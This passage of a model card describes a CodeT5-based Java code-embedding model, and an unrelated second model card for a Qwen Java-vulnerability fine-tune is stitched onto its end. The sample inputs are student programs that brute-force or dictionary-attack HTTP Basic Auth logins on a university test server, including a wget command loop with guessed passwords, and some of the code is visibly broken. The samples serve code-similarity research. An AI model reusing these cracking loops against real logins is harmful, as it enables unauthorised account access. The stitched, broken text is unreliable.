System.out.println(\"Usage: java Dictionary url user dictionary\"\ );\n System.exit(-1);\n }\n try {\n location = new URL(args[0]);\n\ \ }\n catch (MalformedURLException e) {\n e.printStackTrace();\n\ \ }\n user = new String().concat(args[1]);\n try {\n dictionary\ \ = new BufferedReader(new FileReader(args[2]));\n }\n catch (IOException\ \ e) {\n e.printStackTrace();\n System.exit(-1);\n }\n \ \ new Dictionary();\n }\n\n \n\n class MyAuthenticator extends Authenticator\ \ {\n protected PasswordAuthentication getPasswordAuthentication() {\n \ \ char [] currentPassword = nextPassword();\n System.out.print(user.concat(\"\ -\"));\n System.out.println(currentPassword);\n return new PasswordAuthentication\ \ (user, currentPassword);\n }\n }\n}\n" - source_sentence: "\n\n\n\n\n\nimport java.io.*;\nimport java.net.*;\n\n\n\npublic\ \ class Dictionary\n{\n public static void main (String args[]) throws IOException,\n\ \ MalformedURLException\n {\n final String username = \"\";\n final\ \ String fullurl = \"http://sec-crack.cs.rmit.edu./SEC/2/\";\n final String\ \ dictfile = \"/usr/share/lib/dict/words\";\n String temppass;\n String\ \ password = \"\";\n URL url = new URL(fullurl);\n boolean cracked =\ \ false;\n\n startTime = System.currentTimeMillis();\n\n \n BufferedReader\ \ r = new BufferedReader(new FileReader(dictfile));\n\n while((temppass =\ \ r.readLine()) != null && !cracked)\n { \n \n if(temppass.length()\ \ <= 3)\n {\n \n if(isAlpha(temppass))\n \ \ {\n \n Authenticator.setDefault(new MyAuthenticator(username,temppass));\n\ \ try{\n BufferedReader x = new BufferedReader(new\ \ InputStreamReader(\n url.openStream()));\n \ \ cracked = true;\n password = temppass;\n \ \ } catch(Exception e){}\n }\n }\n }\n\n stopTime\ \ = System.currentTimeMillis();\n \n if(!cracked)\n System.out.println(\"\ Sorry, couldnt find the password\");\n else\n System.out.println(\"\ Password found: \"+password);\n System.out.println(\"Time taken: \"+(stopTime-startTime));\n\ \ }\n\n public static boolean isAlpha(String s)\n {\n boolean v = true;\n\ \ for(int i=0; i<s.length(); i++)\n {\n if(!Character.isLetter(s.charAt(i)))\n\ \ v = false;\n }\n return ;\n }\n}\n\n" sentences: - "\n\nimport java.net.*;\nimport java.text.*; \nimport java.util.*; \nimport\ \ java.io.*;\n\npublic class WatchDog {\n\n public WatchDog() {\n\n StringBuffer\ \ stringBuffer1 = new StringBuffer();\n StringBuffer stringBuffer2 = new StringBuffer();\n\ \ int i,j = 0;\n\n try{\n\n URL yahoo = new URL(\"http://www.cs.rmit.edu./students/\"\ ); \n BufferedReader in = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\ \n String inputLine = \"\";\n String inputLine1 = \"\";\n String\ \ changedtext= \"\";\n String changedflag= \"\";\n\n\n Thread.sleep(180);\n\ \n BufferedReader in1 = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\ \n\n while ((inputLine = in.readLine()) != null) {\n inputLine1\ \ = in1.readLine();\n if (inputLine.equals(inputLine1)) {\n \ \ System.out.println(\"equal\");\n }\n else {\n \ \ System.out.println(\"Detected a Change\");\n System.out.println(\"\ Line Before the change:\" + inputLine);\n System.out.println(\"Line\ \ After the change:\" + inputLine1);\n changedtext = changedtext\ \ + inputLine + inputLine1;\n changedflag = \"Y\";\n }\n\ \ \n }\n\n if (in1.readLine() != null ) {\n System.out.println(\"\ Detected a Change\");\n System.out.println(\"New Lines Added \");\n \ \ changedtext = changedtext + \"New Lines added\";\n changedflag\ \ = \"Y\";\n }\n\n in.print();\n in1.print();\n\n if 
(changedflag.equals(\"\ Y\")) {\n String smtphost =\"smtp.mail.rmit.edu.\" ; \n String\ \ from = \"@rmit.edu.\"; \n String = \"janaka1@optusnet..\" ; \n \ \ }\n\n\n }\n catch(Exception e){ System.out.println(\"exception:\" + e);}\n\ \t \n}\n\t\t\n public static void main (String[] args) throws Exception {\n\ \t\tWatchDog u = new WatchDog();\n }\n}\n" - "\n\n\n\nimport java.util.*;\nimport java.net.*;\nimport java.io.*;\nimport javax.swing.*;\n\ \npublic class PasswordCombination\n{\n private int pwdCounter = 0;\n\ \ private int startTime;\n private String str1,str2,str3;\n private\ \ String url = \"http://sec-crack.cs.rmit.edu./SEC/2/\";\n private String\ \ loginPwd;\n private String[] password;\n private HoldSharedData data;\n\ \ private char[] chars = {'A','B','C','D','E','F','G','H','I','J','K','L','M',\n\ \ 'N','O','P','Q','R','S','T','U','V','W','X','Y','Z',\n\ \ 'a','b','c','d','e','f','g','h','i','j','k','l','m',\n\ \ 'n','o','p','q','r','s','t','u','v','w','x','y','z'};\n\ \n public PasswordCombination()\n {\n System.out.println(\"Programmed\ \ by for INTE1070 Assignment 2\");\n\n String input = JOptionPane.showInputDialog(\ \ \"Enter number of threads\" );\n if( input == null )\n System.exit(0);\n\ \n int numOfConnections = Integer.parseInt( input );\n startTime\ \ = System.currentTimeMillis();\n int pwdCounter = 52*52*52 + 52*52 + 52;\n\ \ password = new String[pwdCounter];\n\n\n loadPasswords();\n \ \ System.out.println( \"Total Number of Passwords: \" + pwdCounter );\n \ \ createConnectionThread( numOfConnections );\n }\n\n private void\ \ doPwdCombination()\n {\n for( int i = 0; i < 52; i ++ )\n {\n\ \ str1 = \"\" + chars[i];\n password[pwdCounter++] = \"\"\ \ + chars[i];\n System.err.print( str1 + \" | \" );\n\n \ \ for( int j = 0; j < 52; j ++ )\n {\n str2 = str1 +\ \ chars[j];\n password[pwdCounter++] = str1 + chars[j];\n\n \ \ for( int k = 0; k < 52; k ++ )\n {\n \ \ str3 = str2 + chars[k];\n password[pwdCounter++] =\ \ str2 + chars[k];\n }\n }\n }\n }\n\n \ \ private void loadPasswords( )\n {\n FileReader fRead;\n \ \ BufferedReader buf;\n String line = null;\n String \ \ fileName = \"words\";\n\n try\n {\n fRead = new\ \ FileReader( fileName );\n buf = new BufferedReader(fRead);\n\n \ \ while((line = buf.readLine( )) != null)\n {\n \ \ password[pwdCounter++] = line;\n }\n }\n catch(FileNotFoundException\ \ e)\n {\n System.err.println(\"File not found: \" + fileName);\n\ \ }\n catch(IOException ioe)\n {\n System.err.println(\"\ IO Error \" + ioe);\n }\n }\n\n private void createConnectionThread(\ \ int input )\n {\n data = new HoldSharedData( startTime, password,\ \ pwdCounter );\n\n int numOfThreads = input;\n int batch = pwdCounter/numOfThreads\ \ + 1;\n numOfThreads = pwdCounter/batch + 1;\n System.out.println(\"\ Number of Connection Threads Used=\" + numOfThreads);\n ConnectionThread[]\ \ connThread = new ConnectionThread[numOfThreads];\n\n for( int index =\ \ 0; index < numOfThreads; index ++ )\n {\n connThread[index]\ \ = new ConnectionThread( url, index, batch, data );\n connThread[index].conn();\n\ \ }\n }\n} " - "import java.io.*;\nimport java.util.StringTokenizer;\nimport java.net.smtp.SmtpClient;\n\ import java.util.Timer;\nimport java.util.TimerTask;\n\n\npublic class WatchDog\ \ {\npublic static void main(String[] args) {\ntry {\nProcess y = Runtime.getRuntime().exec(\"\ ./init\");\n}\ncatch (Exception e) {System.err.println(e);}\n\n\nWatchDog poodle=new\ \ WatchDog();\n {\npoodle.startWatch();\n} while(1==1);\n}\n\npublic void startWatch()\ \ {\nString 
error_mes=new String();\nString mesg=new String();\nString url=\"\ wget -p http://www.cs.rmit.edu./students\";\n\ntry {\nProcess a = Runtime.getRuntime().exec(url);\n\ }\ncatch (Exception e) {System.err.println(e);}\n\ntry {\nProcess b = Runtime.getRuntime().exec(\"\ diff org/images/ www.cs.rmit.edu./images/\");\n BufferedReader stdInputimages\ \ = new BufferedReader(new InputStreamReader(b.getInputStream()));\n \ \ while ((error_mes = stdInputimages.readLine()) != null) {\n\n \ \ mesg=mesg.concat(error_mes);\n \n \n \ \ }\n}\ncatch (Exception e) {System.err.println(e);}\n\n\n\n\ntry {\nProcess\ \ c = Runtime.getRuntime().exec(\"diff org/students/ www.cs.rmit.edu./students/\"\ );\nBufferedReader stdInputindex = new BufferedReader(new InputStreamReader(c.getInputStream()));\n\ \ while ((error_mes = stdInputindex.readLine()) != null) {\n \ \ mesg=mesg.concat(error_mes);\n \n }\n}\n\ catch (Exception e) {System.err.println(e);}\n\n\nif (mesg.length()>0) { sendEmail(mesg);\ \ }\n\ntry { Thread.sleep(60*60*24*1000);\n } catch(Exception e) { }\n}\n\n\n\n\ \n\npublic void sendEmail(String message) {\n{\nString reciever = \"@cs.rmit.edu.\"\ ;\nString sender = \"[email protected].\";\n\n try {\n\n \ \ SmtpClient smtp = new SmtpClient();\n smtp.from(sender);\n\ \ smtp.to(reciever);\n PrintStream\ \ msg = smtp.startMessage();\n msg.println(message);\n\ \ smtp.closeServer();\n }\n\n \ \ catch (Exception e) {}\n\n }\n}\n}" pipeline_tag: sentence-similarity library_name: sentence-transformers --- # SentenceTransformer based on Salesforce/codet5-small This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [Salesforce/codet5-small](https://huggingface.co/Salesforce/codet5-small). It maps sentences & paragraphs to a 512-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more. ## Model Details ### Model Description - **Model Type:** Sentence Transformer - **Base model:** [Salesforce/codet5-small](https://huggingface.co/Salesforce/codet5-small) <!-- at revision b1ee9570c289f21b5922b9c768a1ce12957bf968 --> - **Maximum Sequence Length:** 512 tokens - **Output Dimensionality:** 512 dimensions - **Similarity Function:** Cosine Similarity <!-- - **Training Dataset:** Unknown --> <!-- - **Language:** Unknown --> <!-- - **License:** Unknown --> ### Model Sources - **Documentation:** [Sentence Transformers Documentation](https://sbert.net) - **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers) - **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers) ### Full Model Architecture ``` SentenceTransformer( (0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: T5EncoderModel (1): Pooling({'word_embedding_dimension': 512, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True}) ) ``` ## Usage ### Direct Usage (Sentence Transformers) First install the Sentence Transformers library: ```bash pip install -U sentence-transformers ``` Then you can load this model and run inference. 
```python from sentence_transformers import SentenceTransformer # Download from the 🤗 Hub model = SentenceTransformer("buelfhood/SOCO-Java-CodeT5Small-ST") # Run inference sentences = [ '\n\n\n\n\n\nimport java.io.*;\nimport java.net.*;\n\n\n\npublic class Dictionary\n{\n public static void main (String args[]) throws IOException,\n MalformedURLException\n {\n final String username = "";\n final String fullurl = "http://sec-crack.cs.rmit.edu./SEC/2/";\n final String dictfile = "/usr/share/lib/dict/words";\n String temppass;\n String password = "";\n URL url = new URL(fullurl);\n boolean cracked = false;\n\n startTime = System.currentTimeMillis();\n\n \n BufferedReader r = new BufferedReader(new FileReader(dictfile));\n\n while((temppass = r.readLine()) != null && !cracked)\n { \n \n if(temppass.length() <= 3)\n {\n \n if(isAlpha(temppass))\n {\n \n Authenticator.setDefault(new MyAuthenticator(username,temppass));\n try{\n BufferedReader x = new BufferedReader(new InputStreamReader(\n url.openStream()));\n cracked = true;\n password = temppass;\n } catch(Exception e){}\n }\n }\n }\n\n stopTime = System.currentTimeMillis();\n \n if(!cracked)\n System.out.println("Sorry, couldnt find the password");\n else\n System.out.println("Password found: "+password);\n System.out.println("Time taken: "+(stopTime-startTime));\n }\n\n public static boolean isAlpha(String s)\n {\n boolean v = true;\n for(int i=0; i<s.length(); i++)\n {\n if(!Character.isLetter(s.charAt(i)))\n v = false;\n }\n return ;\n }\n}\n\n', '\n\nimport java.net.*;\nimport java.text.*; \nimport java.util.*; \nimport java.io.*;\n\npublic class WatchDog {\n\n public WatchDog() {\n\n StringBuffer stringBuffer1 = new StringBuffer();\n StringBuffer stringBuffer2 = new StringBuffer();\n int i,j = 0;\n\n try{\n\n URL yahoo = new URL("http://www.cs.rmit.edu./students/"); \n BufferedReader in = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\n String inputLine = "";\n String inputLine1 = "";\n String changedtext= "";\n String changedflag= "";\n\n\n Thread.sleep(180);\n\n BufferedReader in1 = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\n\n while ((inputLine = in.readLine()) != null) {\n inputLine1 = in1.readLine();\n if (inputLine.equals(inputLine1)) {\n System.out.println("equal");\n }\n else {\n System.out.println("Detected a Change");\n System.out.println("Line Before the change:" + inputLine);\n System.out.println("Line After the change:" + inputLine1);\n changedtext = changedtext + inputLine + inputLine1;\n changedflag = "Y";\n }\n \n }\n\n if (in1.readLine() != null ) {\n System.out.println("Detected a Change");\n System.out.println("New Lines Added ");\n changedtext = changedtext + "New Lines added";\n changedflag = "Y";\n }\n\n in.print();\n in1.print();\n\n if (changedflag.equals("Y")) {\n String smtphost ="smtp.mail.rmit.edu." ; \n String from = "@rmit.edu."; \n String = "janaka1@optusnet.." 
; \n }\n\n\n }\n catch(Exception e){ System.out.println("exception:" + e);}\n\t \n}\n\t\t\n public static void main (String[] args) throws Exception {\n\t\tWatchDog u = new WatchDog();\n }\n}\n', '\n\n\n\nimport java.util.*;\nimport java.net.*;\nimport java.io.*;\nimport javax.swing.*;\n\npublic class PasswordCombination\n{\n private int pwdCounter = 0;\n private int startTime;\n private String str1,str2,str3;\n private String url = "http://sec-crack.cs.rmit.edu./SEC/2/";\n private String loginPwd;\n private String[] password;\n private HoldSharedData data;\n private char[] chars = {\'A\',\'B\',\'C\',\'D\',\'E\',\'F\',\'G\',\'H\',\'I\',\'J\',\'K\',\'L\',\'M\',\n \'N\',\'O\',\'P\',\'Q\',\'R\',\'S\',\'T\',\'U\',\'V\',\'W\',\'X\',\'Y\',\'Z\',\n \'a\',\'b\',\'c\',\'d\',\'e\',\'f\',\'g\',\'h\',\'i\',\'j\',\'k\',\'l\',\'m\',\n \'n\',\'o\',\'p\',\'q\',\'r\',\'s\',\'t\',\'u\',\'v\',\'w\',\'x\',\'y\',\'z\'};\n\n public PasswordCombination()\n {\n System.out.println("Programmed by for INTE1070 Assignment 2");\n\n String input = JOptionPane.showInputDialog( "Enter number of threads" );\n if( input == null )\n System.exit(0);\n\n int numOfConnections = Integer.parseInt( input );\n startTime = System.currentTimeMillis();\n int pwdCounter = 52*52*52 + 52*52 + 52;\n password = new String[pwdCounter];\n\n\n loadPasswords();\n System.out.println( "Total Number of Passwords: " + pwdCounter );\n createConnectionThread( numOfConnections );\n }\n\n private void doPwdCombination()\n {\n for( int i = 0; i < 52; i ++ )\n {\n str1 = "" + chars[i];\n password[pwdCounter++] = "" + chars[i];\n System.err.print( str1 + " | " );\n\n for( int j = 0; j < 52; j ++ )\n {\n str2 = str1 + chars[j];\n password[pwdCounter++] = str1 + chars[j];\n\n for( int k = 0; k < 52; k ++ )\n {\n str3 = str2 + chars[k];\n password[pwdCounter++] = str2 + chars[k];\n }\n }\n }\n }\n\n private void loadPasswords( )\n {\n FileReader fRead;\n BufferedReader buf;\n String line = null;\n String fileName = "words";\n\n try\n {\n fRead = new FileReader( fileName );\n buf = new BufferedReader(fRead);\n\n while((line = buf.readLine( )) != null)\n {\n password[pwdCounter++] = line;\n }\n }\n catch(FileNotFoundException e)\n {\n System.err.println("File not found: " + fileName);\n }\n catch(IOException ioe)\n {\n System.err.println("IO Error " + ioe);\n }\n }\n\n private void createConnectionThread( int input )\n {\n data = new HoldSharedData( startTime, password, pwdCounter );\n\n int numOfThreads = input;\n int batch = pwdCounter/numOfThreads + 1;\n numOfThreads = pwdCounter/batch + 1;\n System.out.println("Number of Connection Threads Used=" + numOfThreads);\n ConnectionThread[] connThread = new ConnectionThread[numOfThreads];\n\n for( int index = 0; index < numOfThreads; index ++ )\n {\n connThread[index] = new ConnectionThread( url, index, batch, data );\n connThread[index].conn();\n }\n }\n} ', ] embeddings = model.encode(sentences) print(embeddings.shape) # [3, 512] # Get the similarity scores for the embeddings similarities = model.similarity(embeddings, embeddings) print(similarities.shape) # [3, 3] ``` <!-- ### Direct Usage (Transformers) <details><summary>Click to see the direct usage in Transformers</summary> </details> --> <!-- ### Downstream Usage (Sentence Transformers) You can finetune this model on your own dataset. 
<details><summary>Click to expand</summary> </details> --> <!-- ### Out-of-Scope Use *List how the model may foreseeably be misused and address what users ought not to do with the model.* --> <!-- ## Bias, Risks and Limitations *What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.* --> <!-- ### Recommendations *What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.* --> ## Training Details ### Training Dataset #### Unnamed Dataset * Size: 33,411 training samples * Columns: <code>sentence_0</code>, <code>sentence_1</code>, and <code>label</code> * Approximate statistics based on the first 1000 samples: | | sentence_0 | sentence_1 | label | |:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-----------------------------------------------| | type | string | string | int | | details | <ul><li>min: 52 tokens</li><li>mean: 444.58 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 52 tokens</li><li>mean: 470.35 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>0: ~99.80%</li><li>1: ~0.20%</li></ul> | * Samples: | sentence_0 | sentence_1 | label | |:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------|:---------------| | <code> <br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class MyTimer<br>{ <br><br> public static void main(String args[])<br> {<br> Watchdog watch = new Watchdog();<br> Timer time = new Timer();<br> time.schedule(watch,864000000,864000000);<br> <br> <br> }<br>}<br></code> | <code><br><br>import java.io.*;<br>import java.*;<br>import java.net.*;<br>import java.util.*;<br><br>public class Dictionary {<br> public static void main (String[] args) throws IOException {<br> BufferedReader stdin = new BufferedReader (new InputStreamReader(System.in));<br><br> d = new Date().getTime();<br> FileReader fr = new FileReader("/usr/share/lib/dict/words");<br> BufferedReader bufr = new BufferedReader(fr);<br> String word = bufr.readLine(); <br> int total = 960;<br> String[] pws = new String[total];<br> int count = 0;<br> while (word!=null){<br> if (word.length()<=3) { pws[count] = word; count++;}<br> word = bufr.readLine();<br> }<br> <br> int i=0;<br> int response = 0;<br> for (i=0;i<count;i++){<br> String uname = "";<br> String userinfo = uname + ":" + pws[i];<br> try{<br> String encoding = new bf.misc.BASE64Encoder().encode (userinfo.getBytes());<br> URL url = new URL("http://sec-crack.cs.rmit.edu./SEC/2/");<br> HttpURLConn...</code> | <code>0</code> | | <code><br>import java.io.*;<br>import java.util.*;<br><br><br>class BruteForce{<br><br>public static void main(String args[]){<br><br>String pass,s;<br>char a,b,c;<br>int z=0;<br>int attempt=0;<br>Process p;<br><br><br>char password[]={'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q',<br> 'R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g','h',<br> 'i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'};<br> z = System.currentTimeMillis();<br>int at=0;<br>for(int i=0;i<password.length;i++){<br> for(int j=0;j<password.length;j++){<br> for(int k=0;k<password.length;k++){<br> pass=String.valueOf(password[i])+String.valueOf(password[j])+String.valueOf(password[k]);<br><br> try {<br> System.out.println("Trying crack using: "+pass);<br> at++;<br><br><br> p = Runtime.getRuntime().exec("wget --http-user= --http-passwd="+pass+" http://sec-crack.cs.rmit.edu./SEC/2/index.php");<br> try{<br> p.waitFor();<br> }<br> catch(Exception q){}<br><br><br> z = p.exitValue();<br><br><br> ...</code> | <code><br>import java.io.*;<br>import java.util.Vector;<br>import java.util.Date;<br><br><br>interface UnaryPredicate {<br> boolean execute(Object obj);<br>}<br><br><br>public class DiffPrint {<br> <br> static String outFile="";<br><br> public static abstract class Base {<br> protected Base(Object[] a,Object[] b) {<br> try<br> {<br> outfile = new PrintWriter(new FileWriter(outFile)); <br> }<br> catch (Exception e)<br> {<br> e.printStackTrace();<br> }<br> file0 = a;<br> file1 = b;<br> }<br> <br> protected UnaryPredicate ignore = null;<br><br> <br> protected Object[] file0, file1;<br><br> <br> public void print_script(Diff.change script) {<br> Diff.change next = script;<br><br> while (next != null)<br> {<br> Diff.change t, end;<br><br> <br> t = next;<br> end = hunkfun(next);<br><br> <br> next = end;<br> end = null;<br> <br> <br><br> <br> print_hunk(t);<br><br> <br> end = next;<br> }<br> outfile.flush();<br> }<br><br> <br><br> protected Diff.change hunkfun(Diff.change hunk) {<br> ...</code> | <code>0</code> | | <code>package java.httputils;<br><br>import 
java.io.BufferedInputStream;<br>import java.io.BufferedOutputStream;<br>import java.io.BufferedReader;<br>import java.io.FileInputStream;<br>import java.io.FileNotFoundException;<br>import java.io.FileOutputStream;<br>import java.io.FileReader;<br>import java.io.IOException;<br>import java.io.OutputStream;<br><br><br>public class WatchDog<br>{<br> protected final int MILLIS_IN_HOUR = (60 * 60 * 1000);<br> protected int interval = 24;<br> protected String URL = "http://www.cs.rmit.edu./students/";<br> protected String fileName = "WatchDogContent.html";<br> protected String command = "./alert_mail.sh";<br> protected String savedContent;<br> protected String retrievedContent;<br><br> <br> public WatchDog()<br> {<br> super();<br> }<br><br> <br> public void run() throws Exception<br> {<br> HttpRequestClient client = null;<br> <br> <br> System.out.println(getClass().getName() +<br> "Retrieving baseline copy of: " + getURL());<br> client = new HttpRequestClie...</code> | <code><br><br>import java.*;<br>import java.io.*;<br>import java.util.*;<br><br>public class Dictionary<br>{<br> public String[] passwds;<br> public int passwdNum;<br> public static void main(String[] args) throws IOException<br> {<br> Dictionary dic=new Dictionary();<br> dic.doDictionary();<br> System.exit(1);<br> }<br><br> void doDictionary() throws IOException<br> {<br> Runtime rt=Runtime.getRuntime();<br> passwds=new String[32768];<br> passwdNum=0;<br><br> time1=new Date().getTime();<br> <br> try<br> {<br> File f = new File ("words");<br> FileReader fin = new FileReader (f);<br> BufferedReader buf = new BufferedReader(fin);<br> passwds[0]="00";<br> System.out.println(" loading words....");<br> <br> {<br> passwds[passwdNum]=buf.readLine();<br> passwdNum++;<br> }while(passwds[passwdNum-1]!=null);<br> System.out.println("Finish loading words.");<br> } catch (FileNotFoundException exc) {<br> System.out.println ("File Not Found");<br> } catch (IOException exc) {<br> System.out.println ("IOException 1");<br> } catch (NullPointerException exc) {<br> System.out.println ("NullPointerEx...</code> | <code>0</code> | * Loss: [<code>BatchAllTripletLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#batchalltripletloss) ### Training Hyperparameters #### Non-Default Hyperparameters - `per_device_train_batch_size`: 16 - `per_device_eval_batch_size`: 16 - `num_train_epochs`: 1 - `multi_dataset_batch_sampler`: round_robin #### All Hyperparameters <details><summary>Click to expand</summary> - `overwrite_output_dir`: False - `do_predict`: False - `eval_strategy`: no - `prediction_loss_only`: True - `per_device_train_batch_size`: 16 - `per_device_eval_batch_size`: 16 - `per_gpu_train_batch_size`: None - `per_gpu_eval_batch_size`: None - `gradient_accumulation_steps`: 1 - `eval_accumulation_steps`: None - `torch_empty_cache_steps`: None - `learning_rate`: 5e-05 - `weight_decay`: 0.0 - `adam_beta1`: 0.9 - `adam_beta2`: 0.999 - `adam_epsilon`: 1e-08 - `max_grad_norm`: 1 - `num_train_epochs`: 1 - `max_steps`: -1 - `lr_scheduler_type`: linear - `lr_scheduler_kwargs`: {} - `warmup_ratio`: 0.0 - `warmup_steps`: 0 - `log_level`: passive - `log_level_replica`: warning - `log_on_each_node`: True - `logging_nan_inf_filter`: True - `save_safetensors`: True - `save_on_each_node`: False - `save_only_model`: False - `restore_callback_states_from_checkpoint`: False - `no_cuda`: False - `use_cpu`: False - `use_mps_device`: False - `seed`: 42 - `data_seed`: None - `jit_mode_eval`: False - `use_ipex`: False - `bf16`: False - 
`fp16`: False - `fp16_opt_level`: O1 - `half_precision_backend`: auto - `bf16_full_eval`: False - `fp16_full_eval`: False - `tf32`: None - `local_rank`: 0 - `ddp_backend`: None - `tpu_num_cores`: None - `tpu_metrics_debug`: False - `debug`: [] - `dataloader_drop_last`: False - `dataloader_num_workers`: 0 - `dataloader_prefetch_factor`: None - `past_index`: -1 - `disable_tqdm`: False - `remove_unused_columns`: True - `label_names`: None - `load_best_model_at_end`: False - `ignore_data_skip`: False - `fsdp`: [] - `fsdp_min_num_params`: 0 - `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False} - `fsdp_transformer_layer_cls_to_wrap`: None - `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None} - `deepspeed`: None - `label_smoothing_factor`: 0.0 - `optim`: adamw_torch - `optim_args`: None - `adafactor`: False - `group_by_length`: False - `length_column_name`: length - `ddp_find_unused_parameters`: None - `ddp_bucket_cap_mb`: None - `ddp_broadcast_buffers`: False - `dataloader_pin_memory`: True - `dataloader_persistent_workers`: False - `skip_memory_metrics`: True - `use_legacy_prediction_loop`: False - `push_to_hub`: False - `resume_from_checkpoint`: None - `hub_model_id`: None - `hub_strategy`: every_save - `hub_private_repo`: None - `hub_always_push`: False - `gradient_checkpointing`: False - `gradient_checkpointing_kwargs`: None - `include_inputs_for_metrics`: False - `include_for_metrics`: [] - `eval_do_concat_batches`: True - `fp16_backend`: auto - `push_to_hub_model_id`: None - `push_to_hub_organization`: None - `mp_parameters`: - `auto_find_batch_size`: False - `full_determinism`: False - `torchdynamo`: None - `ray_scope`: last - `ddp_timeout`: 1800 - `torch_compile`: False - `torch_compile_backend`: None - `torch_compile_mode`: None - `include_tokens_per_second`: False - `include_num_input_tokens_seen`: False - `neftune_noise_alpha`: None - `optim_target_modules`: None - `batch_eval_metrics`: False - `eval_on_start`: False - `use_liger_kernel`: False - `eval_use_gather_object`: False - `average_tokens_across_devices`: False - `prompts`: None - `batch_sampler`: batch_sampler - `multi_dataset_batch_sampler`: round_robin </details> ### Training Logs | Epoch | Step | Training Loss | |:------:|:----:|:-------------:| | 0.2393 | 500 | 0.2122 | | 0.4787 | 1000 | 0.1686 | | 0.7180 | 1500 | 0.2193 | | 0.9574 | 2000 | 0.2084 | ### Framework Versions - Python: 3.11.13 - Sentence Transformers: 4.1.0 - Transformers: 4.52.4 - PyTorch: 2.6.0+cu124 - Accelerate: 1.7.0 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citation ### BibTeX #### Sentence Transformers ```bibtex @inproceedings{reimers-2019-sentence-bert, title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks", author = "Reimers, Nils and Gurevych, Iryna", booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing", month = "11", year = "2019", publisher = "Association for Computational Linguistics", url = "https://arxiv.org/abs/1908.10084", } ``` #### BatchAllTripletLoss ```bibtex @misc{hermans2017defense, title={In Defense of the Triplet Loss for Person Re-Identification}, author={Alexander Hermans and Lucas Beyer and Bastian Leibe}, year={2017}, eprint={1703.07737}, archivePrefix={arXiv}, primaryClass={cs.CV} } ``` <!-- ## Glossary *Clearly define terms in order to be accessible across audiences.* --> <!-- ## 
Model Card Authors *Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.* --> <!-- ## Model Card Contact *Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.* -->
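The commented-out Downstream Usage section above notes that the model can be fine-tuned on your own dataset. A minimal sketch with the same `BatchAllTripletLoss` follows; the toy Java snippets and integer labels are invented placeholders, not the SOCO training pairs described above, and this is not the authors' original training script.

```python
from datasets import Dataset
from sentence_transformers import SentenceTransformer, SentenceTransformerTrainer
from sentence_transformers.losses import BatchAllTripletLoss

model = SentenceTransformer("buelfhood/SOCO-Java-CodeT5Small-ST")

# Toy placeholder data: texts sharing an integer label count as positives;
# BatchAllTripletLoss mines every valid (anchor, positive, negative) triplet
# inside each batch.
train_dataset = Dataset.from_dict({
    "sentence": [
        "public int add(int a, int b) { return a + b; }",
        "public int sum(int x, int y) { return x + y; }",
        "System.out.println(\"hello\");",
        "System.out.print(\"hi\");",
    ],
    "label": [0, 0, 1, 1],
})

loss = BatchAllTripletLoss(model)
trainer = SentenceTransformerTrainer(model=model, train_dataset=train_dataset, loss=loss)
trainer.train()
```

With a toy set this small the loss may find few valid triplets per batch; in practice you would supply many examples per label so that each batch contains several positives for every anchor.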
barryallen16/Qwen2_5_1.5B_java_vul
barryallen16
2025-06-11T10:38:02Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "qwen2", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:37:47Z
--- base_model: unsloth/qwen2.5-coder-1.5b-instruct-bnb-4bit tags: - text-generation-inference - transformers - unsloth - qwen2 - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** barryallen16 - **License:** apache-2.0 - **Finetuned from model :** unsloth/qwen2.5-coder-1.5b-instruct-bnb-4bit This qwen2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
